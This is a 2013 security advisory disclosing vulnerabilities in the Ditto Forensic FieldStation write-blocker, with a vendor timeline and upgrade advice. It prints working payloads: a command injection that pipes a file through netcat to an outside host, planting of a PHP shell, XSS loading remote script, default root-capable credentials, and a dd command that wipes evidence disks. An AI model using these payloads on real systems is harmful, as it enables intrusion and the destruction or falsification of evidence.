228 lines
No EOL
8.6 KiB
Text
228 lines
No EOL
8.6 KiB
Text
**************************************************************
|
|
Title: Ditto Forensic FieldStation, multiple vulnerabilities
|
|
Versions affected: <= 2013Oct15a (all)
|
|
Vendor: CRU Wiebetech
|
|
Discovered by: Martin Wundram
|
|
Email: wundram@digitrace.de
|
|
Date found: 2013-04-22
|
|
Date published: 2013-12-12
|
|
Status: partially patched
|
|
**************************************************************
|
|
|
|
|
|
0] ======== Introduction / Background / Impact ========
|
|
In computer forensics (http://en.wikipedia.org/wiki/Computer_forensics) one
|
|
essential requirement is that evidence data does not get modified at all (or
|
|
not unnoticed, at least). Therefore IT forensic experts use write-blockers to
|
|
ensure a read-only access to evidence data like hard disks or USB mass
|
|
storage.
|
|
|
|
The Ditto Forensic FieldStation is such a special equipment (hardware with
|
|
embedded software) used by forensic experts to analyse and copy evidence data
|
|
in a safe and secure way. The ditto is explicitly marketed as a device to
|
|
acquire data from network file shares, too. This means it is meant to be
|
|
connected to possibly hostile networks of suspects.
|
|
|
|
However it was found to be vulnerable up to the point of not being reliable as
|
|
a computer forensic device.
|
|
|
|
|
|
1] ======== OS Command Injection ========
|
|
Class: Command Injection [CWE-77]
|
|
Impact: Code execution
|
|
Remotely Exploitable: Yes
|
|
CVE Name: CVE-2013-6881
|
|
CVSS v2 Base Score: 10
|
|
Overall CVSS v2 Score: 9.2
|
|
CVSS v2 Vector:
|
|
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)
|
|
|
|
Several input fields of the web application are vulnerable to OS command
|
|
injection. E.g. the application allows the setting of parameters like 'sector
|
|
size' or 'skip count' for a forensic imaging task. Because of improper
|
|
neutralization in combination with the web server running with root
|
|
privileges, an attacker is able to access and manipulate the complete system.
|
|
|
|
Example 1 (setting of 'sector size' = 1 with malicious content):
|
|
|
|
1;cat /opt/web/htdocs/index.php | nc 192.168.1.1 6666;
|
|
|
|
Example 2 (setting of 'set-size' = 1 with copying a PHP shell from
|
|
the external SD card):
|
|
|
|
1;cp /ditto/shell.php /opt/web/htdocs;
|
|
|
|
|
|
2] ======== Persistent XSS ========
|
|
Class: Cross-site Scripting [CWE-79]
|
|
Impact: Code execution
|
|
Remotely Exploitable: Yes
|
|
Status: unpatched
|
|
CVE Name: CVE-2013-6882
|
|
CVSS v2 Base Score: 9
|
|
Overall CVSS v2 Score (if patched): 9.2
|
|
CVSS v2 Vector:
|
|
(AV:N/AC:L/Au:N/C:P/I:C/A:P/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)
|
|
Overall CVSS v2 Score (unpatched): 10
|
|
|
|
The web application suffers from multiple vulnerabilities regarding XSS. The
|
|
first one (a) is critical because an unauthorized attacker is able to push
|
|
malicious code into the system and consequently attacking every user. The
|
|
other ones (b) need authentication first.
|
|
|
|
a) The web application logs every login (including the username) in a not
|
|
sanitized way to a system log. Additionally, the web application embeds that
|
|
system log rendered as HTML into the start page of every user who successfully
|
|
logs in. Thus an unprivileged attacker can persistently inject malicious code
|
|
which attacks all users of the vulnerable system immediately after their
|
|
login.
|
|
|
|
Example:
|
|
|
|
POSTDATA=
|
|
user=demo%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
|
|
&pass=demo&login=Log+In
|
|
|
|
|
|
b) It is easily possible to submit malicious data as input into multiple HTML
|
|
form fields (e.g. one can force the system to load externally hosted
|
|
JavaScript code with <script src=http://www.hacker.tld/code.js></script>).
|
|
This can result in dangerous situations where the (external) JavaScript code
|
|
mangles the information displayed about important computer forensic key values
|
|
whose integrity is crucial.
|
|
|
|
Example:
|
|
784 PetaByte (PB) source disk instead of 32 GB, investigator "Al Capone",
|
|
"verify actions: yes" instead of "no", ...
|
|
|
|
|
|
3] ======== Cross-Site Request Forgery ========
|
|
Class: Cross-Site Request Forgery [CWE-352]
|
|
Impact: Application misuse
|
|
Remotely Exploitable: Yes
|
|
CVE Name: CVE-2013-6883
|
|
CVSS v2 Base Score: 6.6
|
|
Overall CVSS v2 Score: 8
|
|
CVSS v2 Vector:
|
|
(AV:N/AC:H/Au:N/C:P/I:C/A:P/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)
|
|
|
|
The web application is vulnerable to attacks using Cross-Site Request Forgery.
|
|
E.g. the disk erase technique (correct settings are important for the reliable
|
|
deletion of sensitive forensic data) can be changed with a simple POST
|
|
request.
|
|
|
|
|
|
4] ======== Misconfigured Daemon Rights ========
|
|
Class: Configuration [CWE-16]
|
|
Impact: Full system access
|
|
|
|
The web server lighthttpd and the PHP engine are run as user 'root'. Thus
|
|
injection weaknesses in the 'ditto' web application result in immediate full
|
|
system access.
|
|
|
|
|
|
5] ======== Unneeded Daemons/Software ========
|
|
Class: Configuration [CWE-16]
|
|
Impact: Attackable services
|
|
Best matching CCE-ID: CCE-4268-9
|
|
|
|
Forensic usage needs only write-blocking and imaging of evidence data.
|
|
However, the base system contains further active software and services. This
|
|
helps attacking the system and escalating privileges. The tools/daemons are
|
|
especially netcat and an active SSHd. Furthermore, the SSHd binds to the
|
|
network port which is labeled as 'source' and thus intended for usage in
|
|
supposedly hostile network environments - the network containing evidence data
|
|
from suspects.
|
|
|
|
|
|
6] ======== Use of standard credentials ========
|
|
Class: Use of Hard-coded Credentials [CWE-798]
|
|
Impact: unwanted full system access
|
|
Remotely Exploitable: Yes
|
|
CVE Name: CVE-2013-6884
|
|
CVSS v2 Base Score: 10
|
|
Overall CVSS v2 Score: 9.2
|
|
CVSS v2 Vector:
|
|
(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:O/RC:C/CDP:MH/TD:ND/CR:H/IR:H/AR:L)
|
|
|
|
The ditto write-blocker contains a default system user named 'ditto' with the
|
|
default password 'ditto' which is allowed to elevate its user rights to root
|
|
(sudo) without further authentication. In combination with the active SSHd,
|
|
this vulnerability allows attackers full access to the ditto if it gets
|
|
connected to the same/reachable network.
|
|
|
|
|
|
7] ======== Misconfigured Core System ========
|
|
Class: Configuration [CWE-16]
|
|
Impact: Alteration of evidence data
|
|
Remotely Exploitable: Yes
|
|
|
|
Although explicitly marketed as a hardware write-blocker, the ditto does not
|
|
implement any specific write-blocking mechanism at all. The underlying system
|
|
is able to manipulate or even erase evidence on devices which are connected to
|
|
the 'source side' of the ditto. The problem is: no hardware-level, no driver-
|
|
level and no kernel-level (blockdev) write-blocking are implemented. Only the
|
|
web application prevents the user from writing to the source media. That is
|
|
just security by obscurity. Finally, every critical weakness or simple
|
|
malfunction in the web application can potentiallly lead to overwriting of
|
|
source/evidence data.
|
|
|
|
Furthermore, the embedded Linux system itself mounts the system partition as
|
|
writable. Thus malware could be persistently deployed!
|
|
|
|
Example:
|
|
One can simply overwrite supposedly write-protected source data (USB stick
|
|
and
|
|
SATA disk) with
|
|
dd if=/dev/zero of=/dev/sda.
|
|
|
|
|
|
8] ======== Solution ========
|
|
Upgrade your ditto to the newest available firmware (2013Oct15a). Don't
|
|
connect the device to potentially hostile networks. Examine your device if it
|
|
has been manipulated at an earlier time (has someone placed a backdoor in the
|
|
embedded Linux, or a malware which silently manipulates evidence data or
|
|
copies of evidence data?).
|
|
|
|
|
|
9] ======== Report Timeline ========
|
|
2013-04-22 Discovery of vulnerabilities
|
|
2013-04-23 First contact with vendor including agreement about later public
|
|
disclosure
|
|
2013-04-26 Detailed information about vulnerabilities provided to vendor
|
|
2013-06-30 Vendor fixes some vulnerabilities with firmware 2013Jun30a
|
|
2013-10-15 Vendor fixes some vulnerabilities with firmware 2013Oct15a
|
|
2013-11-26 Information with details provided to vendor about upcoming public
|
|
disclosure. Vendor gave feedback regarding technical accuracy of
|
|
this report
|
|
2013-12-12 Public disclosure
|
|
|
|
|
|
10] ======== Discussion ========
|
|
Because integrity is of utmost importance during the forensic process (correct
|
|
handling of evidence data and correct deduction of conclusions and
|
|
implications), even small vulnerabilities in forensic tools and devices become
|
|
critical.
|
|
|
|
|
|
11] ======== References ========
|
|
a)
|
|
http://www.cru-inc.com/support/software-downloads/ditto-firmware-
|
|
updates/ditto-firmware-release-notes-2013oct15a/
|
|
b)
|
|
http://www.cru-inc.com/support/software-downloads/ditto-firmware-
|
|
updates/ditto-firmware-release-notes-2013jun30a/
|
|
|
|
|
|
--
|
|
Diplom-Wirtschaftsinformatiker Martin G. Wundram
|
|
|
|
DigiTrace GmbH - Kompetenz in IT-Forensik
|
|
Geschäftsführer: Alexander Sigel, Martin Wundram
|
|
Registergericht Köln, HR B 72919
|
|
USt-IdNr: DE278529699
|
|
|
|
Zollstockgürtel 59, 50969 Köln
|
|
Telefon: 0221-6 77 86 95-0
|
|
Website: www.DigiTrace.de
|
|
E-Mail: info@DigiTrace.de |